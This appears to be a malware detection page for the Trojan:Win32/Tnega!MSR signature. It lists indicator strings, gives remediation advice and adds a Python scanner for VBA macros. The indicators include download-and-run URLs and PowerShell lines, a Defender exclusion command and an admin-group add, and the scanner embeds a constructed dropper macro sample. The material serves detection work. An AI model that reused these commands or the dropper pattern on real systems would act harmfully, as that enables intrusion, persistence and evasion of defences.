Signature match: Trojan:Win32/Tnega!MSR. Type: Trojan (software that appears legitimate but performs malicious actions). Platform: Win32 (32-bit Windows). Family: Tnega.
Trojan:Win32/Tnega!MSR covers a Trojan whose infection chain, judging from the macro strings listed below, starts with malicious VBA macros in Office documents. The macro creates a WScript.Shell object to run commands, fetches additional payloads from remote URLs through msxml2.xmlhttp, decodes base64 content via an MSXML "base64" DOM element, and drops disguised executables such as "wsdts.db" or "onenote.db" into plausible-looking paths under the user profile (for example %UserProfile%\AppData\Local\Microsoft\OneNote) or C:\ProgramData, then launches them with wscript.exe. Several of the strings are deliberately split at the source ("WScript." + "She" + "ll", "w" + "script" + ".exe") to defeat naive substring matching. Note that the list is a composite: alongside the macro indicators it carries strings from unrelated .NET, Delphi and batch-script binaries (game resources, an autologon batch file, Defender-exclusion and Run-key persistence commands), so a single matching string such as ".exe" or "https:" is a weak indicator on its own; the macro download, drop and execute chain is the reliable part.
Relevant strings associated with this threat:
- https://cdn.jsd (PEHSTR_EXT)
- gh/i87924hgHd (PEHSTR_EXT)
- y/bboxfu<', 'that3.e (PEHSTR_EXT)
- CreateObject("WScript.Shell") (MACROHSTR_EXT)
- //smartscreentestratings2.net/ (MACROHSTR_EXT)
- .exe (MACROHSTR_EXT)
- https: (MACROHSTR_EXT)
- .Run CreateObject("Scripting.FileSystemObject"). (MACROHSTR_EXT)
- .exe" (MACROHSTR_EXT)
- CreateObject("Scripting.FileSystemObject").FileExists(szFile) (MACROHSTR_EXT)
- Set oNode = oXML.CreateElement("base64") (MACROHSTR_EXT)
- = Environ("UserProfile") & "\AppData\Local\Microsoft\Notice (MACROHSTR_EXT)
- dllPath = workDir & "\" & binName (MACROHSTR_EXT)
- binName = "wsdts.db (MACROHSTR_EXT)
- = ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
- = curDocName & " .docx" (MACROHSTR_EXT)
- workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote" (MACROHSTR_EXT)
- dllPath = workDir & "\onenote.db" (MACROHSTR_EXT)
- Dm = "http://craghoppers.icu/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
- Dm = "http://moveis-schuster-com.ga/Order.jpg|||msxml2.xmlhttp (MACROHSTR_EXT)
- Set xmlHttp = CreateObject(VB) (MACROHSTR_EXT)
- .Open "get", strURL (MACROHSTR_EXT)
- + "objShell.Run Base64Decode(" (MACROHSTR_EXT)
- = "C:\Windows\System32\w" + "script" + ".exe " (MACROHSTR_EXT)
- "WScript." + "She" + "ll" (MACROHSTR_EXT)
- + "." + "v" (MACROHSTR_EXT)
- GetDllName = "C:\ProgramData\desktop.dat" (MACROHSTR_EXT)
- .CreateElement("base64") (MACROHSTR_EXT)
- ActiveDocument.Path & "\" & ActiveDocument.Name (MACROHSTR_EXT)
- , ".") - 1) (MACROHSTR_EXT)
- CreateObject("Word.Application") (MACROHSTR_EXT)
- viebobpspa_autologon_admin.bat (PEHSTR_EXT)
- autologon.exe !viebobpspa EU odeA5SvxTzsDa7kwqDq6K6Xr8Bukha -accepteula (PEHSTR_EXT)
- net localgroup administrators eu\!viebobpspa /add (PEHSTR_EXT)
- C:\TEMP\2890.tmp\viebobpspa_autologon_admin.bat (PEHSTR_EXT)
- System.Runtime.InteropServices (PEHSTR_EXT)
- System.Runtime.CompilerServices (PEHSTR_EXT)
- System.Resources (PEHSTR_EXT)
- CowsAndBulls.GameForm.resources (PEHSTR_EXT)
- CowsAndBulls.HighScoresForm.resources (PEHSTR_EXT)
- CowsAndBulls.MainMenuForm.resources (PEHSTR_EXT)
- CowsAndBulls.Properties.Resources.resources (PEHSTR_EXT)
- cmd.exe /c powershell.exe -windowstyle hidden Sleep 5 (PEHSTR_EXT)
- GetCommandLineW (PEHSTR_EXT)
- TOKEN_STEALER_CREATOR.Properties (PEHSTR_EXT)
- ItroublveTSC\bin_copy\obj\Debug (PEHSTR_EXT)
- 4S;/M (SNID)
- ApplyRequest.dll (PEHSTR)
- ScriptDDL (PEHSTR)
- _lstStatusExec (PEHSTR)
- _reqScript (PEHSTR)
- ExecuteAllSteps (PEHSTR)
- SendProgressExec (PEHSTR)
- GerarScriptsDrop (PEHSTR)
- GetListReplaceDll (PEHSTR)
- lblcomputadorresponsavel (PEHSTR)
- DgFqNyZD2NcjS7p60JGMch18mc8g (PEHSTR_EXT)
- RESUTILS.dll (PEHSTR)
- RPCRT4.dll (PEHSTR)
- wsnmp32.dll (PEHSTR)
- SOFTWARE\Borland\Delphi\RTL (PEHSTR)
- sqlite3.dll (PEHSTR)
- /C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR)
- _acmdln (PEHSTR)
- __p__commode (PEHSTR)
- /uke3 (SNID)
- 99`\, (SNID)
- TankGame.My.Resources (PEHSTR_EXT)
- TankGame.Game.resources (PEHSTR_EXT)
- TankGame.MainForm.resources (PEHSTR_EXT)
- TankGame.StartUp.resources (PEHSTR_EXT)
- TankGame.Resources.resources (PEHSTR_EXT)
- TankGame.MultipleBlocks.resources (PEHSTR_EXT)
- TankGame.InGameOptions.resources (PEHSTR_EXT)
- TankGame.QuickStart.resources (PEHSTR_EXT)
- C:\ProgramData\Avast Software\Avast\aswResp.dat (PEHSTR_EXT)
- SOFTWARE\Borland\Delphi\CPM (PEHSTR_EXT)
- _acmdln (PEHSTR_EXT)
- __p__commode (PEHSTR_EXT)
- sqlite3.dll (PEHSTR_EXT)
- \VersionIndependentProgID (PEHSTR_EXT)
- DefenderCSP.dll (PEHSTR_EXT)
- 3yD`. (SNID)
- bcrypt.dll (PEHSTR_EXT)
- zeeLog.txt (PEHSTR_EXT)
- Interfaces.ShellExtension.JumpList (PEHSTR_EXT)
- file.dat (PEHSTR_EXT)
- ShellExecuteW (PEHSTR_EXT)
- Task24Main.pdb (PEHSTR_EXT)
- HttpWebResponse (PEHSTR_EXT)
- CellManager.g.resources (PEHSTR_EXT)
- CellManager.exe (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
- XRails.Controls (PEHSTR_EXT)
- TwiceSlicePanel.UI (PEHSTR_EXT)
- Client.Connection (PEHSTR_EXT)
- \7AAAAAAAAAAAAAA (PEHSTR_EXT)
- ppphhyf.exe (PEHSTR_EXT)
- dKO:. (SNID)
- Oc\p! (SNID)
- powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath (PEHSTR_EXT)
- report_error.php?key=125478824515ADNxu2ccbwe&msg=No-Exes-Found-To-Run (PEHSTR_EXT)
- http://sornx.xyz (PEHSTR_EXT)
- myip.php (PEHSTR_EXT)
- addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
- addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=12 (PEHSTR_EXT)
- Cadave.pdb (PEHSTR_EXT)
- Top1Mu.Net (PEHSTR_EXT)
- Data/Logo/System.pro (PEHSTR_EXT)
- Release\Main.pdb (PEHSTR_EXT)
- OhTTij5lmnomlkjst\Xuh (PEHSTR_EXT)
- $I3\$ (PEHSTR_EXT)
- https://cdn.discordapp.com/attachments/895494963515772931/895591057251762186/test_2.dll (PEHSTR_EXT)
- D:\OneDrive\Projects\OneDriveTimer\OneDriveTimerUI\obj\Release\OneDriveTimerUI.pdb (PEHSTR_EXT)
- OneDriveTimerUI.Properties.Resources (PEHSTR_EXT)
- CenterToScreen (PEHSTR_EXT)
- SetThreadExecutionState (PEHSTR_EXT)
- @Uj/<[]t (SNID)
- MtgKERNEL32.dll (PEHSTR_EXT)
- DonWS2_32.dll (PEHSTR_EXT)
- Zu8K{. (SNID)
- www.Yanjie.com (PEHSTR_EXT)
- http://101.35.18.254/444.exe (PEHSTR_EXT)
- \111.exe (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- C:\ProgramData\444.exe (PEHSTR_EXT)
- ShellExecute (PEHSTR_EXT)
- D$,lExe (PEHSTR_EXT)
- q</2nK*>De!'7p/V (PEHSTR_EXT)
- JoinDomain.exe (PEHSTR_EXT)
- Software\ASProtect\Key (PEHSTR_EXT)
- aspr_keys.ini (PEHSTR_EXT)
- WkBycm9qZ2VxbGloSWZlbVQlKlFdbn5/ZGJgUyMvHRpKIzwnJTN2YXx5cjYnJDYpLkQ2OkBaeHF0c3dta21BVE5Tfww= (PEHSTR_EXT)
- powershell wget https://bit.ly/3uNrtcg -O pin.txt (PEHSTR_EXT)
- DownloadString('https://bit.ly/3uLJ706') (PEHSTR_EXT)
- /home/keith/builds/mingw/gcc-9.2.0-mingw32-cross-native/mingw32/libgcc (PEHSTR_EXT)
- 3<$1<$3<$\ (PEHSTR_EXT)
- Dr4Zaap3qgP4pRB4NWbs9NQuRWalMrMG1AUda1mSG6I5n7u1nNriGo3RF0+Z/lfgeMNzjv46nK1VAIz9QXZ+VfgNxpd (PEHSTR_EXT)
- tOH82ARnxdnufgODepMgEFCePdFSF4aj26l6HYbXlsnhvCh/NaRIPs+LM/BZtNDSNWyzOq2I4Xdho6ao= (PEHSTR_EXT)
- +n51hDmYO9yaWP1yiFGAdu/cEvP8ojbpxBqFHzn7xvH (PEHSTR_EXT)
- InitializeComponent (PEHSTR_EXT)
- quanlykho.Properties (PEHSTR_EXT)
- textbin.net/raw/ (PEHSTR_EXT)
- cmdvrt64 (PEHSTR_EXT)
- ogd368hc.dll (PEHSTR_EXT)
- !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
- rundll32 (PEHSTR_EXT)
- !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
- !#HSTR:StringCodeForSoftwarePacking.C!pli (PEHSTR_EXT)

Hash listed with this detection (SHA-256): 47439044a81b96be0bb34e544da881a393a30f0272616f52f54405b4bf288c7c

Isolate the affected system immediately, run a full scan with up-to-date antivirus signatures to remove the detected files, and check for persistence mechanisms and additional dropped payloads: the strings above point at the HKCU/HKLM Software\Microsoft\Windows\CurrentVersion\Run key, Defender exclusions added with Add-MpPreference -ExclusionPath, unexpected members of the local Administrators group (an autologon account is created in one sample), and disguised .db/.dat files under the user profile and C:\ProgramData. If the compromise appears extensive, rebuild the system or restore it from a trusted backup.
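The following is an added example, not code from the original page or from the malware author: a small static triage scanner for VBA macro source text (as dumped by a macro extractor) that matches the MACROHSTR indicators listed above. Its point is the normalisation step: it folds split string literals such as "WScript." + "She" + "ll" and "w" + "script" + ".exe" back into whole literals before matching, because the split form exists precisely to defeat plain substring scanners, and it only raises a verdict when the download, drop and execute parts of the chain appear together rather than on a lone ".exe" or "https:" string. The two macro samples embedded in it are constructed for illustration and are not real Tnega samples; the indicator names are labels chosen here, not Microsoft's.

```python
"""Static macro triage against the MACROHSTR indicators on this page.

Added example (not the page's or the malware author's code). Input is VBA
macro source text; the two samples at the bottom are constructed.
"""
import re

# Needles copied from the page's MACROHSTR_EXT list, grouped by role.
MACRO_INDICATORS = {
    "wscript_shell": 'CreateObject("WScript.Shell")',
    "run_decoded": 'objShell.Run Base64Decode(',
    "xmlhttp_get": '.Open "get", strURL',
    "c2_smartscreen": '//smartscreentestratings2.net/',
    "c2_craghoppers": 'http://craghoppers.icu/Order.jpg',
    "c2_schuster": 'http://moveis-schuster-com.ga/Order.jpg',
    "onenote_drop": r'\AppData\Local\Microsoft\OneNote',
    "notice_drop": r'\AppData\Local\Microsoft\Notice',
    "desktop_dat": r'C:\ProgramData\desktop.dat',
    "wsdts_db": 'wsdts.db',
    "onenote_db": 'onenote.db',
    "base64_node": '.CreateElement("base64")',
    "fso_fileexists": 'CreateObject("Scripting.FileSystemObject").FileExists(',
}
EXECUTE = {"wscript_shell", "run_decoded"}
DOWNLOAD = {"xmlhttp_get", "c2_smartscreen", "c2_craghoppers", "c2_schuster"}
DROP = {"onenote_drop", "notice_drop", "desktop_dat", "wsdts_db", "onenote_db"}

# Two adjacent string literals joined by + or & (VBA escapes a quote as "").
_CONCAT = re.compile(r'"((?:[^"\r\n]|"")*)"\s*[+&]\s*"((?:[^"\r\n]|"")*)"')
_LINE_CONT = re.compile(r'[ \t]+_\r?\n[ \t]*')   # VBA " _" line continuation


def normalize_vba(src: str) -> str:
    """Join line continuations and fold split literals until nothing changes."""
    text = _LINE_CONT.sub(' ', src)
    prev = None
    while prev != text:               # "a" + "b" + "c" needs two passes
        prev = text
        text = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
    return re.sub(r'[ \t]+', ' ', text)


def scan_macro(src: str) -> dict:
    """Case-insensitive indicator match on the normalised text (VBA ignores case)."""
    norm = normalize_vba(src).lower()
    hits = sorted(n for n, needle in MACRO_INDICATORS.items() if needle.lower() in norm)
    return {"hits": hits, "normalized": norm}


def verdict(hits) -> str:
    """Require the chain, not a lone string: download + execute + drop."""
    h = set(hits)
    if h & DOWNLOAD and h & EXECUTE and h & DROP:
        return "dropper-chain"
    if h & EXECUTE and (h & DOWNLOAD or h & DROP):
        return "suspicious"
    return "clean-or-weak"


# Constructed sample mimicking the split-string and drop-path tricks above.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim o, workDir, dllPath, xmlHttp, strURL
    Set o = CreateObject("WScript." + "She" + "ll")
    workDir = Environ("UserProfile") & "\AppData\Local\Microsoft\OneNote"
    dllPath = workDir & "\onenote.db"
    Set xmlHttp = CreateObject("msxml2" & "." & "xmlhttp")
    xmlHttp.Open "get", strURL, False
    o.Run "C:\Windows\System32\w" + "script" + ".exe " & dllPath, 0
End Sub
'''

# Constructed benign macro: uses FileSystemObject legitimately, no chain.
BENIGN_MACRO = r'''
Sub SaveCopy()
    Dim fso, target
    Set fso = CreateObject("Scripting.FileSystemObject")
    target = ActiveDocument.Path & "\backup.docx"
    If Not fso.FileExists(target) Then ActiveDocument.SaveAs2 target
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        r = scan_macro(src)
        print(name, verdict(r["hits"]), r["hits"])
```

Feed it the macro text of a suspect document; the constructed sample resolves to a "dropper-chain" verdict only because the folded literals expose CreateObject("WScript.Shell") and the OneNote drop path together with the xmlhttp download, while the benign macro hits nothing. Strings that are not split in this way would be missed by a scanner that skipped the normalisation step.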